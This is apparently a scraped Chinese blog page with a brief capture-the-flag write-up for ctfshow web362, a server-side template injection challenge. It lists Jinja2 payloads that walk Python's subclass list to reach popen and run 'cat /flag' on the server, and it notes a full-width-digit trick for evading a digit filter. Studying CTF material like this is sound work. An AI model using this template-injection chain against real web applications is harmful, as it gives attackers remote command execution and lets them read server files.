当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到这一步都是正常的
从12开始就没用了
数字出现了问题,看wp用全角数字代替正常数字绕过
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然后应该可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_62094846/article/details/124361669
边栏推荐
- Custom prompt box MessageBox in QT
- QT error: no matching member function for call to ‘connect‘
- Cells in rust share variable pointers
- QT reading and writing XML files (including source code + comments)
- Rewrite four functions such as StrCmp in C language
- Matlab tips (6) comparison of seven filtering methods
- Pointers in rust: box, RC, cell, refcell
- Nodejs安装
- Analysez l'objet promise avec le noyau dur (Connaissez - vous les sept API communes obligatoires et les sept questions clés?)
- Imx6 debugging LVDS screen technical notes
猜你喜欢
机器学习实战 -朴素贝叶斯
Function recursion and solving interesting problems
Robocode tutorial 7 - Radar locking
From introduction to mastery of MATLAB (2)
硬核解析Promise对象(这七个必会的常用API和七个关键问题你都了解吗?)
logstash 7. There is a time problem in X. the difference between @ timestamp and local time is 8 hours
Imx6 debugging LVDS screen technical notes
Notepad + + replaces tabs with spaces
Resolves the interface method that allows annotation requests to be written in postman
MATLAB小技巧(6)七种滤波方法比较
随机推荐
ESP32 LVGL8. 1 - label (style 14)
14个py小游戏源代码分享第二弹
CISSP certified daily knowledge points (April 19, 2022)
Refcell in rust
According to the result set queried by SQL statement, it is encapsulated as JSON
CANopen STM32 transplantation
Mode of interprocess communication
kettle庖丁解牛第17篇之文本文件输出
Software test summary
Error reported when running tensorboard: valueerror: duplicate plugins for name projector, solution
Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck
MATLAB从入门到精通(二)
Docker installation MySQL
Creation and use of QT dynamic link library
CISSP certified daily knowledge points (April 15, 2022)
Analysez l'objet promise avec le noyau dur (Connaissez - vous les sept API communes obligatoires et les sept questions clés?)
Use of regular expressions in QT
Can filter
Rust: the output information of println is displayed during the unit test
由tcl脚本生成板子对应的vivado工程